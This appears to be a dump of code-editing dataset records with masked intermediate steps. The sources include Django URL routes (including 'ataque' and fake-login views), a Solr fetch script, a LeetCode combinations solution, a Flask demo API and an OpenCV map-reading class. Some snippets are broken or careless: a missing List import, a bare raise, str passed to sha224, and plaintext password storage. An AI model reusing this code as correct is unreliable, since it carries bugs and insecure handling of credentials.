'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name=
'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=
'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,
name='accounts.flpositivo'), url('^flnegativo/$', views.
falsoLoginNegativo_view, name='accounts.flnegativo')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index_view, name='accounts.index'),
url(r'^login/$', views.login_view, name='accounts.login'),
url(r'^logout/$', views.logout_view, name='accounts.logout'),
url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),
url(r'obrigado/(?P<username>[\w]+)/$', views.obrigado_view, name='accounts.obrigado'),
url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),
url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),
url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),
]
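# Illustrative sketch (hypothetical, kept as a comment so this urls module stays
# free of view code): a view matched by the 'obrigado' pattern above receives the
# captured 'username' as a keyword argument, roughly like:
#
#     def obrigado_view(request, username):
#         return HttpResponse('Obrigado, %s!' % username)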
|
flexible
|
{
"blob_id": "b4d09b6d8ad5f0584f74adc0fd8116265bb6649b",
"index": 4641,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-4": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index_view, name='accounts.index'),\n url(r'^login/$', views.login_view, name='accounts.login'),\n url(r'^logout/$', views.logout_view, name='accounts.logout'),\n url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),\n url(r'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name='accounts.obrigado'),\n url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),\n url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),\n url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
import json
import hashlib
import os
def pull_from_solr(output_directory):
solr_url = 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'
# TODO: ask about auth for this
req = requests.get(solr_url)
if req.status_code != 200:
        raise RuntimeError('Solr request failed with HTTP status %s' % req.status_code)
new_data = req.json()
for doc in new_data['response']['docs']:
doc_url = doc['url']
        doc_sha = hashlib.sha224(doc_url.encode('utf-8')).hexdigest()  # sha224 needs bytes, not str
doc.update({"sha": doc_sha})
with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w') as f:
f.write(json.dumps(doc, indent=4))
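# Usage sketch (illustrative; the directory name is made up): create the target
# directory before dumping one JSON file per Solr document.
if __name__ == '__main__':
    out_dir = 'solr_docs'
    os.makedirs(out_dir, exist_ok=True)
    pull_from_solr(out_dir)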
|
normal
|
{
"blob_id": "47b40e4311f76cd620b7c6ed6b39216d866fa857",
"index": 8530,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef pull_from_solr(output_directory):\n solr_url = (\n 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'\n )\n req = requests.get(solr_url)\n if req.status_code != 200:\n raise\n new_data = req.json()\n for doc in new_data['response']['docs']:\n doc_url = doc['url']\n doc_sha = hashlib.sha224(doc_url).hexdigest()\n doc.update({'sha': doc_sha})\n with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w'\n ) as f:\n f.write(json.dumps(doc, indent=4))\n",
"step-3": "import requests\nimport json\nimport hashlib\nimport os\n\n\ndef pull_from_solr(output_directory):\n solr_url = (\n 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'\n )\n req = requests.get(solr_url)\n if req.status_code != 200:\n raise\n new_data = req.json()\n for doc in new_data['response']['docs']:\n doc_url = doc['url']\n doc_sha = hashlib.sha224(doc_url).hexdigest()\n doc.update({'sha': doc_sha})\n with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w'\n ) as f:\n f.write(json.dumps(doc, indent=4))\n",
"step-4": "import requests\nimport json\nimport hashlib\nimport os\n\n\ndef pull_from_solr(output_directory):\n solr_url = 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'\n\n # TODO: ask about auth for this\n req = requests.get(solr_url)\n\n if req.status_code != 200:\n raise\n\n new_data = req.json()\n\n for doc in new_data['response']['docs']:\n doc_url = doc['url']\n doc_sha = hashlib.sha224(doc_url).hexdigest()\n doc.update({\"sha\": doc_sha})\n\n with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w') as f:\n f.write(json.dumps(doc, indent=4))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def combine(self, n: int, k: int) ->List[List[int]]:
if k == 0:
return [[]]
ans = []
for i in range(k, n + 1):
for temp_ans in self.combine(i - 1, k - 1):
ans.append(temp_ans + [i])
return ans
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import sys
class Solution:
def combine(self, n: int, k: int) ->List[List[int]]:
if k == 0:
return [[]]
ans = []
for i in range(k, n + 1):
for temp_ans in self.combine(i - 1, k - 1):
ans.append(temp_ans + [i])
return ans
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# Problem No.: 77
# Solver: Jinmin Goh
# Date: 20191230
# URL: https://leetcode.com/problems/combinations/
import sys
from typing import List  # List is used in the annotations below
class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
if k == 0:
return [[]]
ans = []
for i in range(k, n + 1) :
for temp_ans in self.combine(i - 1, k - 1):
ans.append(temp_ans + [i])
return ans
"""
# correct for 26/27 and TLE
class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
if k == 0:
return [[]]
if n < k:
return []
nList = [i + 1 for i in range(n)]
if n == k:
return [nList]
if n == k:
return [[i + 1] for i in range(n)]
self.ans = []
if n//2 > k:
self.makeFunc(nList[:], k, [])
else:
self.delFunc(n-k, nList)
return self.ans
def makeFunc(self, nList: list, k: int, temp_ans: list) -> None:
if k == 0:
temp_ans.sort()
if temp_ans not in self.ans:
self.ans.append(temp_ans)
return
else:
return
else:
for i in range(len(nList)):
temp = nList[:]
temp_temp_ans = temp_ans[:]
temp_temp_ans.append(nList[i])
temp.pop(i)
self.makeFunc(temp[:], k-1, temp_temp_ans[:])
def delFunc(self, k: int, temp_ans: list) -> None:
if k == 0:
temp_ans.sort()
if temp_ans not in self.ans:
self.ans.append(temp_ans)
return
else:
return
else:
for i in range(len(temp_ans)):
temp = temp_ans[:]
temp.pop(i)
self.delFunc(k-1, temp[:])
"""
|
flexible
|
{
"blob_id": "e4a2c605ef063eee46880515dfff05562916ab81",
"index": 9976,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def combine(self, n: int, k: int) ->List[List[int]]:\n if k == 0:\n return [[]]\n ans = []\n for i in range(k, n + 1):\n for temp_ans in self.combine(i - 1, k - 1):\n ans.append(temp_ans + [i])\n return ans\n\n\n<mask token>\n",
"step-4": "import sys\n\n\nclass Solution:\n\n def combine(self, n: int, k: int) ->List[List[int]]:\n if k == 0:\n return [[]]\n ans = []\n for i in range(k, n + 1):\n for temp_ans in self.combine(i - 1, k - 1):\n ans.append(temp_ans + [i])\n return ans\n\n\n<mask token>\n",
"step-5": "# Problem No.: 77\n# Solver: Jinmin Goh\n# Date: 20191230\n# URL: https://leetcode.com/problems/combinations/\n\nimport sys\n\nclass Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n if k == 0:\n return [[]]\n ans = []\n for i in range(k, n + 1) :\n for temp_ans in self.combine(i - 1, k - 1):\n ans.append(temp_ans + [i])\n return ans\n\n\"\"\"\n# correct for 26/27 and TLE\nclass Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n if k == 0:\n return [[]]\n if n < k:\n return []\n nList = [i + 1 for i in range(n)]\n if n == k:\n return [nList]\n if n == k:\n return [[i + 1] for i in range(n)]\n self.ans = []\n if n//2 > k:\n self.makeFunc(nList[:], k, [])\n else:\n self.delFunc(n-k, nList)\n return self.ans\n \n def makeFunc(self, nList: list, k: int, temp_ans: list) -> None:\n if k == 0:\n temp_ans.sort()\n if temp_ans not in self.ans:\n self.ans.append(temp_ans)\n return\n else:\n return\n else:\n for i in range(len(nList)):\n temp = nList[:]\n temp_temp_ans = temp_ans[:]\n temp_temp_ans.append(nList[i])\n temp.pop(i)\n self.makeFunc(temp[:], k-1, temp_temp_ans[:])\n def delFunc(self, k: int, temp_ans: list) -> None:\n if k == 0:\n temp_ans.sort()\n if temp_ans not in self.ans:\n self.ans.append(temp_ans)\n return\n else:\n return\n else:\n for i in range(len(temp_ans)):\n temp = temp_ans[:]\n temp.pop(i)\n self.delFunc(k-1, temp[:])\n \"\"\"",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Auth:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
def __init__(self, user: str, pass_: str):
self.user = user
self.pass_ = pass_
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/status')
def get_json_data():
return jsonify({'comment': f'App działa OK; magic:{magic}'})
@app.route('/compute')
def compute():
a = int(request.args.get('a'))
b = int(request.args.get('b'))
print(f'request a={a}, thread:{threading.current_thread().name}')
time.sleep(10.0)
if b == 0:
return jsonify({'comment': 'b==0, cannot divide'}), 400
return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
def __init__(self, user: str, pass_: str):
self.user = user
self.pass_ = pass_
<|reserved_special_token_0|>
@app.route('/user/create', methods=['POST'])
def create_user():
data = request.json
k = Auth(**data)
if users.keys().__contains__(k.user):
return jsonify({'comment': 'This user name already exists!'}), 400
users[k.user] = k
return jsonify(k.__dict__)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import json
import time
from typing import Dict
import threading
<|reserved_special_token_0|>
from flask import Flask, jsonify, request
app = Flask(__name__)
with open('config.json', 'r') as f:
loaded = json.load(f)
magic = loaded['magic']
@app.route('/status')
def get_json_data():
return jsonify({'comment': f'App działa OK; magic:{magic}'})
@app.route('/compute')
def compute():
a = int(request.args.get('a'))
b = int(request.args.get('b'))
print(f'request a={a}, thread:{threading.current_thread().name}')
time.sleep(10.0)
if b == 0:
return jsonify({'comment': 'b==0, cannot divide'}), 400
return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
def __init__(self, user: str, pass_: str):
self.user = user
self.pass_ = pass_
users: Dict[str, Auth] = {}
@app.route('/user/create', methods=['POST'])
def create_user():
data = request.json
k = Auth(**data)
if users.keys().__contains__(k.user):
return jsonify({'comment': 'This user name already exists!'}), 400
users[k.user] = k
return jsonify(k.__dict__)
app.run(host='localhost', port=5001, debug=None, load_dotenv=False)
<|reserved_special_token_1|>
import json
import time
from typing import Dict
import threading
"""
    Note: each request runs in its own thread.
    Inspect with: `top -H -p <process_id>`
"""
from flask import Flask, jsonify, request
app = Flask(__name__)
# https://www.tutorialspoint.com/flask/flask_http_methods.htm
# loading the application configuration (optional, but a good idea);
# after building the application (below), the file "config.json" should sit in the application folder
with open('config.json', 'r') as f:
    loaded = json.load(f)
    magic = loaded['magic']
@app.route('/status')
def get_json_data():
    return jsonify({'comment': f'App działa OK; magic:{magic}'})
# available at: http://localhost:5001/compute?a=10&b=0
@app.route('/compute')
def compute():
    a = int(request.args.get('a'))
    b = int(request.args.get('b'))
    print(f'request a={a}, thread:{threading.current_thread().name}')
    time.sleep(10.0)
    if b == 0:
        # here we return an error message together with HTTP error code 400 (BAD_REQUEST)
        return jsonify({'comment': 'b==0, cannot divide'}), 400
    return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})
# available at: http://localhost:5001/welcome/roadrunner/suffix/nice%20to%20meet%20you
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
    return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
    def __init__(self, user: str, pass_: str):
        self.user = user
        self.pass_ = pass_
# task -> collect users in some structure (e.g. a 'users' list, or a Dict or Set),
# and return an error when creating a user whose "user" field is already taken
# solution:
users: Dict[str, Auth] = {}
# available via Postman (make a POST request):
# localhost:5001/user/create
# in the "body" section choose "raw -> JSON" and put the following JSON:
# {
# 	"user": "Xi Wuhan",
# 	"pass_": "123"
# }
@app.route('/user/create', methods=['POST'])
def create_user():
    data = request.json
    k = Auth(**data)
    if users.keys().__contains__(k.user):
        return jsonify({'comment': 'This user name already exists!'}), 400
    users[k.user] = k
    return jsonify(k.__dict__)
app.run(host='localhost', port=5001, debug=None, load_dotenv=False) # can skip all args
# can be compiled into a single executable file:
# `pyinstaller _zero.py -n my_flask_app --onefile
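# Client-side sketch (illustrative, not part of the original service; kept as a
# comment because app.run() above blocks): exercising /user/create from Python
# instead of Postman, with the same example payload.
#
#     import requests
#     resp = requests.post('http://localhost:5001/user/create',
#                          json={'user': 'Xi Wuhan', 'pass_': '123'})
#     print(resp.status_code, resp.json())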
|
flexible
|
{
"blob_id": "8fcc2a13fd5a803e2d755a567c78c8274bd88aad",
"index": 7283,
"step-1": "<mask token>\n\n\nclass Auth:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/status')\ndef get_json_data():\n return jsonify({'comment': f'App działa OK; magic:{magic}'})\n\n\[email protected]('/compute')\ndef compute():\n a = int(request.args.get('a'))\n b = int(request.args.get('b'))\n print(f'request a={a}, thread:{threading.current_thread().name}')\n time.sleep(10.0)\n if b == 0:\n return jsonify({'comment': 'b==0, cannot divide'}), 400\n return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})\n\n\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\n<mask token>\n\n\[email protected]('/user/create', methods=['POST'])\ndef create_user():\n data = request.json\n k = Auth(**data)\n if users.keys().__contains__(k.user):\n return jsonify({'comment': 'This user name already exists!'}), 400\n users[k.user] = k\n return jsonify(k.__dict__)\n\n\n<mask token>\n",
"step-4": "import json\nimport time\nfrom typing import Dict\nimport threading\n<mask token>\nfrom flask import Flask, jsonify, request\napp = Flask(__name__)\nwith open('config.json', 'r') as f:\n loaded = json.load(f)\n magic = loaded['magic']\n\n\[email protected]('/status')\ndef get_json_data():\n return jsonify({'comment': f'App działa OK; magic:{magic}'})\n\n\[email protected]('/compute')\ndef compute():\n a = int(request.args.get('a'))\n b = int(request.args.get('b'))\n print(f'request a={a}, thread:{threading.current_thread().name}')\n time.sleep(10.0)\n if b == 0:\n return jsonify({'comment': 'b==0, cannot divide'}), 400\n return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})\n\n\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\nusers: Dict[str, Auth] = {}\n\n\[email protected]('/user/create', methods=['POST'])\ndef create_user():\n data = request.json\n k = Auth(**data)\n if users.keys().__contains__(k.user):\n return jsonify({'comment': 'This user name already exists!'}), 400\n users[k.user] = k\n return jsonify(k.__dict__)\n\n\napp.run(host='localhost', port=5001, debug=None, load_dotenv=False)\n",
"step-5": "import json\nimport time\nfrom typing import Dict\nimport threading\n\n\"\"\"\n Note: każdy request uruchamia osobny wątek. \n Przegląd: `top -H -p <process_id>`\n\"\"\"\n\n\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n# https://www.tutorialspoint.com/flask/flask_http_methods.htm\n\n# ładowanie konfiguracji aplikacji (opcjonalne, ale to dobry pomysł);\n# po zbudowaniu aplikacji (poniżej) file \"config.json\" powinien się znajdować w folderze aplikacji\nwith open('config.json', 'r') as f:\n loaded = json.load(f)\n magic = loaded['magic']\n\n\[email protected]('/status')\ndef get_json_data():\n return jsonify({'comment': f'App działa OK; magic:{magic}'})\n\n\n# dostępna pod: http://localhost:5001/compute?a=10&b=0\[email protected]('/compute')\ndef compute():\n a = int(request.args.get('a'))\n b = int(request.args.get('b'))\n print(f'request a={a}, thread:{threading.current_thread().name}')\n time.sleep(10.0)\n if b == 0:\n # teraz zwracamy komunikat o błędzie, oraz http error-code 400 (BAD_REQUEST)\n return jsonify({'comment': 'b==0, cannot divide'}), 400\n return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})\n\n\n# dostępna pod: http://localhost:5001/welcome/roadrunner/suffix/nice%20to%20meet%20you\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\n# zadanie -> zbierać userów w jakieś strukturze (np. liście 'users', albo Dict lub Set),\n# i zwrócić błąd jeśli tworzymy usera, którego pole \"user\" już zostało \"zajęte\"\n# rozwiązanie:\n\nusers: Dict[str, Auth] = {}\n\n\n# dostępna per Postman (trzeba zrobić zapytanie POST):\n# localhost:5001/user/create\n# w sekcji \"body\" trzba dać \"raw -> JSON\", i w polu JSON dodać:\n# {\n# \t\"user\": \"Xi Wuhan\",\n# \t\"pass_\": \"123\"\n# }\[email protected]('/user/create', methods=['POST'])\ndef create_user():\n data = request.json\n k = Auth(**data)\n if users.keys().__contains__(k.user):\n return jsonify({'comment': 'This user name already exists!'}), 400\n users[k.user] = k\n return jsonify(k.__dict__)\n\n\napp.run(host='localhost', port=5001, debug=None, load_dotenv=False) # can skip all args\n\n# możliwa kompilacja do pojedynczego pliku wykonywalnego:\n# `pyinstaller _zero.py -n my_flask_app --onefile\n",
"step-ids": [
1,
3,
6,
9,
10
]
}
|
[
1,
3,
6,
9,
10
] |
import cv2
import pytesseract
import os
from PIL import Image
import numpy as np
from helper_functions import Helper
class ImageData:
# multipliers to get portion of image with interval value
__bottom_thresh = 0.9
__left_thresh = 0.35
__right_thresh = 0.65
# (words, offset) to contour interval value
__words_offsets = [("CONTOUR", 2), ("INTERVAL", 1), ("FEET", -1)]
__resize_factor = 6
def __init__(self, image):
self.image = image
# self.sub_image = self.__get_sub_image()
# word_list, box_list = self.__get_words()
# self.word_list = word_list
# self.box_list = box_list
self._contour_interval_dist = None
self._feet_per_pixel = None
def __get_sub_image(self):
rows, cols, chan = self.image.shape
sub_image = self.image[
int(self.__bottom_thresh*rows):rows, # bottom rows
int(self.__left_thresh*cols):int(self.__right_thresh*cols) # middle rows
]
sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy=self.__resize_factor,
interpolation = cv2.INTER_LINEAR)
sub_image = Helper.convert_image_to_mask(sub_image)
gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, 7, 21)
threshold_image = cv2.threshold(gray_denoised_image,225,255,cv2.THRESH_BINARY_INV)[1]
return sub_image
def __get_countour_interval_dist(self):
candidates = []
for word, offset in self.__words_offsets:
candidates += self.__find_candidates_for_id_and_index(self.word_list, word, offset)
return candidates[0][1] if len(candidates) > 0 else 40
def __get_feet_per_pixel(self):
# row_size = 6
# total = int(len(self.box_list) / 6)
# idx = 0
# nums = [(idx, int(char)) for idx, char in enumerate(self.box_list)
# if idx % row_size == 0 and char.isdigit() and int(char) > 2 and int(char) < 10]
# nums.sort(key=lambda val: self.box_list[val[0] + 2])
# threshold = 3
# prev_x = -1
# prev_y = -2 * threshold
# prev_num = -1
# img = self.sub_image.copy()
# lsd = cv2.createLineSegmentDetector(0)
# lines = lsd.detect(img)[0]
# drawn_img = lsd.drawSegments(img,lines)
# cv2.imshow("LSD",drawn_img )
# # h, w, _ = img.shape
# # for (idx, num) in nums:
# # cur_x = int(self.box_list[idx + 1])
# # cur_y = int(self.box_list[idx + 2])
# # cur_x2 = int(self.box_list[idx + 3])
# # cur_y2 = int(self.box_list[idx + 4])
# # print(str(num) + ": " + str(cur_x) + ", " + str(cur_y) + " :: " + str(cur_x2) + ", " + str(cur_y2))
# # img = cv2.rectangle(img,(cur_x,h-cur_y),(cur_x2,h-cur_y2),(255,0,0),2)
# # # if abs(cur_y - prev_y) < threshold:
# # # dist = abs(cur_x - cur_y)
# # # diff = abs(num - prev_num)
# # # print("possibility found ^\n--------")
# # # prev_x = cur_x
# # # prev_y = cur_y
# # # prev_num = num
# img = cv2.resize(img, None, fx=1/6, fy=1/6,
# interpolation = cv2.INTER_LINEAR)
# cv2.imshow("blah", img)
# print(nums)
        return 5280 / 790  # hardcoded estimate: ft per mile / pixels per mile = feet per pixel
def __find_candidates_for_id_and_index(self, word_list, id_word, offset):
candidates = []
indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]
for i in indices:
if word_list[i+offset].isnumeric():
cand = (i, int(word_list[i+offset]))
candidates.append(cand)
return candidates
def __get_words(self):
filename = "{}.png".format(os.getpid())
cv2.imwrite(filename, self.sub_image)
words = pytesseract.image_to_string(Image.open(filename))
boxes = pytesseract.image_to_string(Image.open(filename), boxes=True, config="hocr")
os.remove(filename)
word_list = words.split()
box_list = boxes.split()
return word_list, box_list
@property
def contour_interval_dist(self):
# if self._contour_interval_dist is None:
# self._contour_interval_dist = self.__get_countour_interval_dist()
# return self._contour_interval_dist
# return 40
return 40
@contour_interval_dist.setter
def contour_interval_dist(self, value):
self._contour_interval_dist = value
@property
def feet_per_pixel(self):
if self._feet_per_pixel is None:
self._feet_per_pixel = self.__get_feet_per_pixel()
return self._feet_per_pixel
@feet_per_pixel.setter
def feet_per_pixel(self, value):
self._feet_per_pixel = value
class TopographicMap:
def __init__(self, filename):
self.filename = filename
self.image = cv2.imread(filename, 1)[500:-550, 500:-500]
# self.image = cv2.imread(filename, 1)#[500:-550, 500:-500]
self.image_data = ImageData(self.image)
self.height, self.width, self.channels = self.image.shape
if __name__ == '__main__':
# img = Topographic_Map("SanLuisObispo.jpg")
import numpy as np
import time
image = cv2.imread('maps/SanLuisObispo.jpg', 1)[500:1000, 500:1300]
r, c, chan = image.shape
tl = image[:int(r/2), :int(c/2)]
tr = image[:int(r/2), int(c/2):]
bl = image[int(r/2):, :int(c/2)]
br = image[int(r/2):, int(c/2):]
s = time.time()
img = cv2.fastNlMeansDenoising(image, None, 5, 7, 21)
e = time.time()
print("total image: " + str(e-s))
s = time.time()
tl = cv2.fastNlMeansDenoising(tl, None, 5, 7, 21)
tr = cv2.fastNlMeansDenoising(tr, None, 5, 7, 21)
bl = cv2.fastNlMeansDenoising(bl, None, 5, 7, 21)
br = cv2.fastNlMeansDenoising(br, None, 5, 7, 21)
e = time.time()
top = np.concatenate((tl, tr), axis=1)
bottom = np.concatenate((bl, br), axis=1)
new_image = np.concatenate((top, bottom), axis=0)
print("partitioned image: " + str(e-s))
cv2.imshow('img', img)
cv2.imshow('new_image', new_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
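# Usage sketch (illustrative; kept as a comment because it needs the same map file
# as above on disk): building a TopographicMap exposes the hardcoded contour
# interval and the estimated feet-per-pixel scale.
#
#     topo = TopographicMap('maps/SanLuisObispo.jpg')
#     print(topo.image_data.contour_interval_dist)  # -> 40
#     print(topo.image_data.feet_per_pixel)         # -> 5280 / 790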
|
normal
|
{
"blob_id": "d3be26d56b3597a5d9e3a870b735a30d90d1e501",
"index": 8165,
"step-1": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n <mask token>\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n <mask token>\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n\n def __get_sub_image(self):\n rows, cols, chan = self.image.shape\n sub_image = self.image[int(self.__bottom_thresh * rows):rows, int(\n self.__left_thresh * cols):int(self.__right_thresh * cols)]\n sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy\n =self.__resize_factor, interpolation=cv2.INTER_LINEAR)\n sub_image = Helper.convert_image_to_mask(sub_image)\n gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, \n 7, 21)\n threshold_image = cv2.threshold(gray_denoised_image, 225, 255, cv2.\n THRESH_BINARY_INV)[1]\n return sub_image\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n\n def __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n candidates = []\n indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n for i in indices:\n if word_list[i + offset].isnumeric():\n cand = i, int(word_list[i + offset])\n candidates.append(cand)\n return candidates\n <mask token>\n\n @property\n def contour_interval_dist(self):\n return 40\n\n @contour_interval_dist.setter\n def contour_interval_dist(self, value):\n self._contour_interval_dist = value\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n <mask token>\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n\n def __get_sub_image(self):\n rows, cols, chan = self.image.shape\n sub_image = self.image[int(self.__bottom_thresh * rows):rows, int(\n self.__left_thresh * cols):int(self.__right_thresh * cols)]\n sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy\n =self.__resize_factor, interpolation=cv2.INTER_LINEAR)\n sub_image = Helper.convert_image_to_mask(sub_image)\n gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, \n 7, 21)\n threshold_image = cv2.threshold(gray_denoised_image, 225, 255, cv2.\n THRESH_BINARY_INV)[1]\n return sub_image\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n\n def __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n candidates = []\n indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n for i in indices:\n if word_list[i + offset].isnumeric():\n cand = i, int(word_list[i + offset])\n candidates.append(cand)\n return candidates\n <mask token>\n\n @property\n def contour_interval_dist(self):\n return 40\n\n @contour_interval_dist.setter\n def contour_interval_dist(self, 